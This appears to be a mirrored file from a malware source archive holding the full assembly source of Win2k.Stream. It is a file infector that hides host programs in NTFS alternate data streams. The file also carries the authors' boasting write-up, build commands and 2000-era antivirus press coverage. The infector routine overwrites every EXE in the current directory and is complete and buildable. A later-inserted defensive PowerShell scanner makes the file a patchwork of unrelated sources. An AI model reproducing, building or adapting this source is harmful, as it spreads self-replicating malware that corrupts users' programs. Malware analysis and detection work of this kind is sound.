mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
635 lines
21 KiB
NASM
COMMENT#

                             ┌────────────────────┐
                             │    Win2k.Stream    │
                             └────────────────────┘
                           ┌─────────────────────────┐
                           │ by Benny/29A and Ratter │
                           └─────────────────────────┘


Let us introduce a very small and simple infector presenting how to use features
of NTFS in viruses. This virus loox like a standard Petite-compressed PE file.
However, it presents the newest way of PE file infecting method.

How the virus worx? It uses streamz, the newest feature of the NTFS filesystem,
and file compression, already implemented in the old NTFS fs.


                   ┌──────────────────────────────────┐
                   │ Basic principles of NTFS streamz │
                   └──────────────────────────────────┘

How the file loox? Ya know that a file contains exactly what you can see when
you open it (e.g. in WinCommander). NTFS, implemented by Windows 2000, has a new
feature - a file can be divided into streamz. The content you see when you open
the file is called the Primary stream - usually files don't have more than one
stream. However, you can create a NEW stream (= new content) in an already
existing file without overwriting the existing content.

Example:

  addressing of primary stream -> <filename>               e.g. "calc.exe"
  addressing of other streamz  -> <filename>:<stream name> e.g. "calc.exe:stream"

If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and
then create a new file "calc.exe:stream" and write there "blahblah". Open
"calc.exe". What's there? Calculator ofcoz. Now open "calc.exe:stream". What's
there? "blahblah", a new file in the old one :)

Can you imagine how useful r streamz for virus coding?

The virus infects a file by moving the old content to the new stream and
replacing the primary stream with the virus code.

File (calc.exe) before infection:

  ╔═Calc.exe════════════════════════╗
  ║┌─Primary stream (visible part)─┐║
  ║│          Calculator           │║
  ║└───────────────────────────────┘║
  ╚═════════════════════════════════╝

File (calc.exe) after infection:

  ╔═Calc.exe═══════════════════════════════════════════════════╗
  ║┌─Primary stream (calc.exe)─┐┌─Next stream (calc.exe:STR)─┐ ║
  ║│           Virus           ││         Calculator         │ ║
  ║└───────────────────────────┘└────────────────────────────┘ ║
  ╚════════════════════════════════════════════════════════════╝

Simple and efficient, ain't it?


                           ┌──────────────────┐
                           │ Details of virus │
                           └──────────────────┘

* The virus infects all EXE files in the current directory.

* The virus uses NTFS file compression as the already-infected mark. All
  infected files are compressed by NTFS and the virus then does not infect
  already compressed files. Well, almost all files after infection r smaller
  than before, so the user won't recognize the virus by checking free disk
  space :)

* If the user copies the infected file to a non-NTFS partition (in this case
  only the primary stream is copied), the host program will be destroyed and
  instead of running the host program the virus will show a message box. That
  can also be called a payload :P

* The virus is very small, exactly 3628 bytes, becoz it's compressed by the
  Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).

* The disinfection is very easy - just copy the content of <file>:STR to
  <file> and delete <file>:STR. If you want to create a sample of an infected
  file, then just copy the virus to some file and copy any program (host
  program) to <file>:STR. That's all! However, AVerz have to rebuild their
  search engine to remove this virus, becoz until now, they had no fucking
  idea what streamz are :)

* This virus was coded in the Czech Republic by Benny/29A and Ratter, at our
  common VX meeting in Ratter's city... we just coded it to show that
  Windows 2000 is just another OS designed for viruses... it really is :)

* We would like to thank GriYo for pointing us to the new NTFS features.
  The fame is also yourz, friend!
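An added example for the two passages above (the <filename>:<stream name> addressing and the disinfection step "copy <file>:STR to <file> and delete <file>:STR"); it is not code from the original page nor from its authors, and is written from the defender's side. It assumes a Windows host running Windows PowerShell 3.0 or later (or PowerShell 7) on an NTFS volume. The function names, parameter names and sample paths are invented for the example; the stream name STR and the Compressed-attribute infection mark (the 800h tested in the source) come from the text.

```powershell
# Added example, not part of the original page or the virus source.
# Defender-side check for the two markers the text describes: the NTFS
# Compressed attribute (FILE_ATTRIBUTE_COMPRESSED = 0x800, the "already
# infected" mark) and an alternate data stream named STR that holds the
# displaced host program. Function and parameter names are assumptions.
# Requires Windows PowerShell 3.0+ or PowerShell 7 on an NTFS volume.

function Get-StreamCompanionCandidate {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,   # directory to scan (assumed)
        [string]$StreamName = 'STR'            # stream name from the document
    )
    Get-ChildItem -LiteralPath $Path -Filter '*.exe' -File | ForEach-Object {
        $file = $_
        # Get-Item -Stream * lists every data stream; ':$DATA' is the primary
        # (visible) content, anything else is an alternate data stream.
        $streams = @(Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue)
        $extra   = @($streams | Where-Object { $_.Stream -ne ':$DATA' })
        $hasStr  = [bool]($extra | Where-Object { $_.Stream -eq $StreamName })
        $isCompressed = ($file.Attributes -band [IO.FileAttributes]::Compressed) -ne 0
        [pscustomobject]@{
            File         = $file.FullName
            PrimaryBytes = $file.Length          # Explorer reports only this size
            Compressed   = $isCompressed
            HasStrStream = $hasStr
            OtherStreams = ($extra | ForEach-Object { "$($_.Stream)=$($_.Length)" }) -join ', '
            # Both markers together are the pattern the document describes;
            # either one alone is common and benign (Zone.Identifier, compact.exe).
            Suspicious   = $isCompressed -and $hasStr
        }
    }
}

function Restore-StreamCompanionHost {
    # Disinfection exactly as the text states it: copy <file>:STR back over
    # <file>, then delete <file>:STR. The displaced primary stream is saved
    # next to the file first so the sample is not lost for analysis.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string]$File,
        [string]$StreamName = 'STR'
    )
    # Get-Content/Set-Content spell "raw bytes" differently in 5.1 and 7.
    $raw = if ($PSVersionTable.PSVersion.Major -ge 6) { @{ AsByteStream = $true } } else { @{ Encoding = 'Byte' } }
    $streams = @(Get-Item -LiteralPath $File -Stream *)
    if (-not ($streams | Where-Object { $_.Stream -eq $StreamName })) {
        throw "$File has no '$StreamName' stream; nothing to restore."
    }
    if (-not $PSCmdlet.ShouldProcess($File, "restore host program from :$StreamName")) { return }

    $backup     = "$File.primary.bak"
    $virusBytes = Get-Content -LiteralPath $File -ReadCount 0 @raw
    Set-Content -LiteralPath $backup -Value $virusBytes @raw

    $hostBytes = Get-Content -LiteralPath $File -Stream $StreamName -ReadCount 0 @raw
    Set-Content -LiteralPath $File -Value $hostBytes @raw      # overwrite primary stream
    Remove-Item -LiteralPath $File -Stream $StreamName          # drop :STR
    # Clear the compression mark too, otherwise the file still matches the
    # check above. compact.exe /U is the stock Windows tool for that.
    & compact.exe /U $File | Out-Null

    [pscustomobject]@{ File = $File; RestoredBytes = $hostBytes.Length; Backup = $backup }
}

# Usage (constructed paths):
#   Get-StreamCompanionCandidate -Path 'C:\samples' | Where-Object Suspicious
#   Restore-StreamCompanionHost -File 'C:\samples\calc.exe' -WhatIf
```

Run the scan first and review the OtherStreams column before restoring anything: a Zone.Identifier stream or a file compressed by compact.exe is ordinary, and only the combination of the Compressed attribute with a STR stream matches what this document describes. Restore-StreamCompanionHost honours -WhatIf and -Confirm through SupportsShouldProcess, and keeps the displaced primary stream in a .primary.bak file.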


                             ┌──────────────┐
                             │ In the media │
                             └──────────────┘


AVP's description:
───────────────────

This is the first known Windows virus using the "stream companion" infection
method. That method is based on an NTFS feature that allows to create multiple
data streams associated with a file.

*NTFS Streams*
---------------

Each file contains at least one default data stream that is accessed just by
the file name. Each file may also contain additional stream(s) that can be
accessed by their personal names (filename:streamname).

The default file stream is the file body itself (in pre-NTFS terms). For
instance, when an EXE file is executed the program is read from the default
file stream; when a document is opened, its content is also read from the
default stream.

Additional file streams may contain any data. The streams cannot be accessed or
modified without reference to the file. When the file is deleted, its streams
are deleted as well; if the file is renamed, the streams follow its new name.

In the Windows package there is no standard tool to view/edit file streams. To
"manually" view file streams you need to use special utilities, for instance
the FAR utility with the file streams support plug-in (Ctrl-PgDn displays file
streams for the selected file).

*Virus Details*
----------------

The virus itself is a Windows application (PE EXE file) compressed using the
Petite PE EXE file compressor and is about 4K in size. When run it infects all
EXE files in the current directory and then returns control to the host file.
If any error occurs, the virus displays the message:

  Win2k.Stream by Benny/29A & Ratter
  This cell has been infected by [Win2k.Stream] virus!

While infecting a file the virus creates a new stream associated with the victim
file. That stream has the name "STR", i.e. the complete stream name is
"FileName:STR". The virus then moves the victim file body to the STR stream
(default stream, see above) and then overwrites the victim file body (default
stream) with its (virus) code.

As a result, when an infected file is executed Windows reads the default stream
(which is overwritten by virus code) and executes it. Also, Windows reports the
same file size for all infected files - that is the virus length.

To release control to the host program the virus just creates a new process by
accessing the original file program using the name "FileName:STR".

That infection method should work on any NTFS system, but the virus checks the
system version and runs only under Win2000.


AVP's press release:
─────────────────────

*A New Generation of Windows 2000 Viruses is Streaming Towards PC Users*
------------------------------------------------------------------------

Moscow, Russia, September 4, 2000 – Kaspersky Lab announces the discovery of
W2K.Stream virus, which represents a new generation of malicious programs for
Windows 2000. This virus uses a new breakthrough technology based on the
"Stream Companion" method for self-embedding into the NTFS file system.

The virus originates from the Czech Republic and was created at the end of
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
Kaspersky Lab has not registered any infections resulting from this virus;
however, its working capacity and ability for existence "in-the-wild" are
unchallenged.

"Certainly, this virus begins a new era in computer virus creation," said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The 'Stream
Companion' technology the virus uses to plant itself into files makes its
detection and disinfection extremely difficult to complete."

Unlike previously known methods of file infection (adding the virus body at
beginning, ending or any other part of a host file), the "Stream" virus
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
data stream – the program code itself. Windows NT/2000 (NTFS) enables users
to create any number of data streams within the file: independent executable
program modules, as well as various service streams (file access rights,
encryption data, processing time etc.). This makes NTFS files very flexible,
allowing for the creation of user-defined data streams aimed at completing
specific tasks.

"Stream" is the first known virus that uses the feature of creating multiple
data streams for infecting files of the NTFS file system (see picture 1). To
complete this, the virus creates an additional data stream named "STR" and
moves the original content of the host program there. Then, it replaces the
main data stream with the virus code. As a result, when the infected program
is run, the virus takes control, completes the replicating procedure and then
passes control to the host program.

*"Stream" file infection procedure*
------------------------------------

  File before infection        File after infection

  ┌───────────────────┐        ┌───────────────────┐
  │░░░░░░░░░░░░░░░░░░░│        │░░░░░░░░░░░░░░░░░░░│
  │░░░░░░░░░░░░░░░░░░░│        │░░░ main stream░░░░│
  │░░░░░░░░░░░░░░░░░░░│        │░░░ virus body░░░░░│
  │░░░░main stream░░░░│        │░░░░░░░░░░░░░░░░░░░│
  │░░░░░░░░░░░░░░░░░░░│        ├───────────────────┤
  │░░░░program body░░░│        │░░░░░░░░░░░░░░░░░░░│
  │░░░░░░░░░░░░░░░░░░░│        │░additional stream░│
  │░░░░░░░░░░░░░░░░░░░│        │░░░program body░░░░│
  │░░░░░░░░░░░░░░░░░░░│        │░░░░░░░░░░░░░░░░░░░│
  ├───────────────────┤        ├───────────────────┤
  │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│        │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│
  │▒▒service streams▒▒│        │▒▒service streams▒▒│
  │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│        │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│
  └───────────────────┘        └───────────────────┘

"By default, anti-virus programs check only the main data stream. There will be
no problems protecting users from this particular virus," Eugene Kaspersky
continues. "However, the viruses can move to additional data streams. In this
case, many anti-virus products will become obsolete, and their vendors will be
forced to urgently redesign their anti-virus engines."


In MSNBC's news:
─────────────────

*New trick can hide computer viruses*
*But experts question danger posed by ‘Stream’ technology*
-----------------------------------------------------------

Sept. 6 — A new kind of computer virus has been released, but security experts
are in disagreement over just how menacing it is. The virus demonstrates a
technique that future writers can use to hide their malicious software from
most current antivirus scanners. But some antivirus companies are playing down
the threat.

THE VIRUS, CALLED W2K.STREAM, poses little threat — it was written as a
relatively benign “proof of concept.” But, according to a source who requested
anonymity, it was posted on several virus writer Web sites over Labor Day
weekend — making copycats possible.

The virus takes advantage of a little-used feature included in Windows 2000 and
older Windows NT systems that allows programs to be split into pieces called
streams. Generally, the body of a program resides in the main stream. But other
streams can be created to store information related to what’s in the main
stream. Joel Scambray, author of “Hacking Exposed,” described these additional
streams as “Post-it notes” attached to the main file.

The problem is that antivirus programs only examine the main stream. W2K.Stream
demonstrates a programmer’s ability to create an additional stream and hide
malicious code there.

“Certainly, this virus begins a new era in computer virus creation,” said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
release. “The ‘Stream Companion’ technology the virus uses to plant itself into
files makes its detection and disinfection extremely difficult to complete.”

*THIS BUG ISN’T DANGEROUS*
---------------------------

No W2K.stream infections have been reported, and experts don’t believe the
virus is “in the wild” — circulating on the Internet — yet. At any rate, this
virus actually makes things easy for antivirus companies. If a user is
infected, the program creates an alternate stream and places the legitimate
file in this alternate location; the virus replaces it as the main stream. That
makes detection by current antivirus products easy. But future viruses could
do just the opposite, evading current antivirus products.

One antivirus researcher who requested anonymity called release of the bug
“somewhat akin to the first macro virus.” He added that reengineering antivirus
software to scan for multiple streams would be a complicated effort.
“In this case, many anti-virus products will become obsolete, and their vendors
will be forced to urgently redesign their anti-virus engines,” Kaspersky said.

*AN OLD ISSUE*
---------------

There is nothing new about the potential of exploiting the multiple stream
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
described it even more explicitly in a 1998 Infoworld.com article.

The SANS Institute, a group of security researchers, issued an “alert”
criticizing antivirus companies for not updating their products to scan the
contents of any file stream earlier.

“We found that the scanners were incapable of identifying viruses stored within
an alternate data stream,” the report said. “For example if you create the file
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
the alternate data stream file, none of the tested virus scanners were capable
of finding the virus during a complete disk scan.”

But some antivirus companies described the threat as minimal because the
alternate stream trick only hides the bug while it’s stored on a victim’s
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
said for the virus to actually run, it has to come out of hiding and load into
main memory.

“It would be detected as it tried to activate,” Palomaki said. “But this
signifies importance of real-time protection.” He added the virus would still
have to find its way onto a victim’s computer; and that victim would have to
be tricked into installing the virus using one of the traditional methods,
such as clicking on an infected e-mail attachment.

“It could increase the ability for scanners to miss something,” said Pat
Nolan, virus researcher at McAfee Corp. “But we’re on top of it. If there is
a vulnerability, it will be short-lived.”


                          ┌────────────────────┐
                          │ How to compile it? │
                          └────────────────────┘

Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).

  tasm32 /ml /m9 /q stream
  tlink32 -Tpe -c -x -aa stream,,,import32
  pewrsec stream.exe
  petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe



And here comes the virus source...
#

.586p
.model flat,stdcall

include win32api.inc                            ;include filez
include useful.inc

extrn ExitProcess:PROC                          ;used APIz
extrn VirtualFree:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn WinExec:PROC
extrn GetCommandLineA:PROC
extrn GetModuleFileNameA:PROC
extrn DeleteFileA:PROC
extrn ReadFile:PROC
extrn CopyFileA:PROC
extrn WriteFile:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn MessageBoxA:PROC
extrn GetFileSize:PROC
extrn VirtualAlloc:PROC
extrn DeviceIoControl:PROC
extrn GetFileAttributesA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn GetVersion:PROC


FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
                                                ;compression flag

STARTUPINFO STRUCT                              ;used by CreateProcessA API
        cb              DWORD ?
        lpReserved      DWORD ?
        lpDesktop       DWORD ?
        lpTitle         DWORD ?
        dwX             DWORD ?
        dwY             DWORD ?
        dwXSize         DWORD ?
        dwYSize         DWORD ?
        dwXCountChars   DWORD ?
        dwYCountChars   DWORD ?
        dwFillAttribute DWORD ?
        dwFlags         DWORD ?
        wShowWindow     WORD  ?
        cbReserved2     WORD  ?
        lpReserved2     DWORD ?
        hStdInput       DWORD ?
        hStdOutput      DWORD ?
        hStdError       DWORD ?
STARTUPINFO ENDS

PROCESS_INFORMATION STRUCT
        hProcess        DWORD ?
        hThread         DWORD ?
        dwProcessId     DWORD ?
        dwThreadId      DWORD ?
PROCESS_INFORMATION ENDS


@pushvar macro variable, empty                  ;macro for pushing variablez
        local next_instr
        ifnb <empty>
                %out too many arguments in macro '@pushvar'
                .err
        endif
        call next_instr
        variable
next_instr:
endm


.data

extExe          db '*.exe',0                    ;search mask

fHandle         dd ?                            ;file search handle
file_name       db MAX_PATH dup(?)              ;actual program name
                db MAX_PATH dup(?)
file_name2      db MAX_PATH dup(?)              ;temporary file
                db 4 dup (?)
WFD             WIN32_FIND_DATA ?               ;win32 find data
proc_info       PROCESS_INFORMATION <>          ;used by CreateProcessA
startup_info    STARTUPINFO <>                  ;...

.code
Start:                                          ;start of virus
        call GetVersion                         ;get OS version
        cmp al,5                                ;5 = Win2000
        jnz msgBox                              ;quit if not Win2000

        mov edi,offset file_name
        push MAX_PATH
        push edi
        push 0
        call GetModuleFileNameA                 ;get path+filename of actual
                                                ;program
        push offset WFD
        push offset extExe
        call FindFirstFileA                     ;find first file to infect
        test eax,eax
        jz end_host
        mov [fHandle],eax                       ;save handle


search_loop:
        call infect                             ;try to infect file

        push offset WFD
        push dword ptr [fHandle]
        call FindNextFileA                      ;try to find next file
        test eax,eax
        jne search_loop                         ;and infect it

        push dword ptr [fHandle]
        call FindClose                          ;close file search handle

end_host:
        mov esi,offset file_name                ;get our filename
        push esi
        @endsz
        dec esi
        mov edi,esi
        mov eax,"RTS:"                          ;append there :"STR" stream
        stosd                                   ;name
        pop esi

        call GetCommandLineA                    ;get command line
        xchg eax,edi                            ;to EDI

        ;esi - app name
        ;edi - cmd line
        xor eax,eax
        push offset proc_info
        push offset startup_info
        push eax
        push eax
        push eax
        push eax
        push eax
        push eax
        push edi
        push esi
        call CreateProcessA                     ;jump to host code
        xchg eax,ecx
        jecxz msgBox                            ;if error, show message box

end_app:
        push 0
        call ExitProcess                        ;exit

msgBox: push 1000h                              ;show some lame msg box :)
        @pushsz "Win2k.Stream by Benny/29A & Ratter"    ;copyleft :]
        @pushsz "This cell has been infected by [Win2k.Stream] virus!"
        push 0                                  ;with name of virus and authorz
        call MessageBoxA
        jmp end_app



infect: push offset [WFD.WFD_szFileName]
        call GetFileAttributesA                 ;check if the file is NTFS
        test eax,800h                           ;compressed = already infected
        jz next_infect
        ret                                     ;quit then

next_infect:
        push offset [WFD.WFD_szFileName]
        mov byte ptr [flagz],OPEN_EXISTING
        call Create_File                        ;open found program
        jz infect_end

        xor eax,eax
        push eax
        @pushvar <dd ?>
        push eax
        push eax
        push 4
        @pushvar <dd 1>                         ;default compression
        push FSCTL_SET_COMPRESSION
        push ebx                                ;NTFS compress it =
        call DeviceIoControl                    ;mark as already infected
                                                ; = and save disk space :)
        push ebx
        call CloseHandle                        ;close file handle

        mov esi,offset file_name2
        push esi
        push 0
        @pushsz "str"
        @pushsz "."
        call GetTempFileNameA                   ;create name for temp file
        test eax,eax
        jz infect_end

        mov edi,offset [WFD.WFD_szFileName]
        push 0
        push esi
        push edi
        call CopyFileA                          ;copy there victim program
        test eax,eax
        jz infect_end


        push 0
        push edi
        push offset file_name
        call CopyFileA                          ;copy ourself to victim program

        push esi

        mov esi,edi
        @endsz
        xchg esi,edi
        dec edi
        mov eax,"RTS:"                          ;append :"STR" stream to
        stosd                                   ;victim program filename
        xor al,al
        stosb

        call Create_File                        ;open victim file
        jz infect_end

        push 0
        push ebx
        call GetFileSize                        ;get its size
        xchg eax,edi

        push PAGE_READWRITE
        push MEM_COMMIT or MEM_RESERVE
        push edi
        push 0
        call VirtualAlloc                       ;allocate enough memory
        test eax,eax                            ;for file content
        jz infect_end_handle

        xchg eax,esi

        xor eax,eax
        push eax
        @pushvar <file_size dd ?>
        push edi
        push esi
        push ebx
        call ReadFile                           ;read file content to
        test eax,eax                            ;allocated memory
        jz infect_end_handle

        push ebx
        call CloseHandle                        ;close its file handle

        push offset file_name2
        call DeleteFileA                        ;delete temporary file

        mov byte ptr [flagz],CREATE_ALWAYS
        push offset [WFD.WFD_szFileName]
        call Create_File                        ;open stream
        jz infect_end_dealloc

        push 0
        mov ecx,offset file_size
        push ecx
        push dword ptr [ecx]
        push esi
        push ebx
        call WriteFile                          ;write there victim program
        test eax,eax
        jz infect_end_handle

infect_end_handle:
        push ebx
        call CloseHandle                        ;close its file handle
infect_end_dealloc:
        push MEM_DECOMMIT
        push dword ptr [file_size]
        push esi
        call VirtualFree                        ;free allocated memory
        push MEM_RELEASE
        push 0
        push esi
        call VirtualFree                        ;release reserved part of mem
infect_end:
        ret

; [esp+4] - file_name
Create_File:                                    ;proc for opening file
        xor eax,eax
        push eax
        push eax
        db 6ah
flagz   db OPEN_EXISTING                        ;variable file open flag
        push eax
        push eax
        push GENERIC_READ or GENERIC_WRITE
        push dword ptr [esp+1ch]
        call CreateFileA                        ;open file
        xchg eax,ebx                            ;handle to EBX
        inc ebx                                 ;is EBX -1?
        lahf                                    ;store flags
        dec ebx                                 ;correct EBX
        sahf                                    ;restore flags
        retn 4                                  ;quit from proc

end Start                                       ;end of virus